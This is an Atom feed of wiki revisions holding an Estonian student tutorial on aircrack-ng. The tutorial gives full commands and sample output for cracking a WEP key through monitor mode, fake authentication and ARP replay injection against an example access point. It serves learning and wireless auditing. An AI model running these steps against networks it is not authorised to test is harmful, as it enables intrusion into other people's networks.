<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ktragel</id>
	<title>ICO wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ktragel"/>
	<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php/Special:Contributions/Ktragel"/>
	<updated>2026-05-09T09:43:12Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89372</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89372"/>
		<updated>2015-05-26T09:36:49Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset ja juhtida tähelepanu selles haavatavatele kohtadele. &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks&lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89367</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89367"/>
		<updated>2015-05-26T09:24:32Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset. &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks&lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
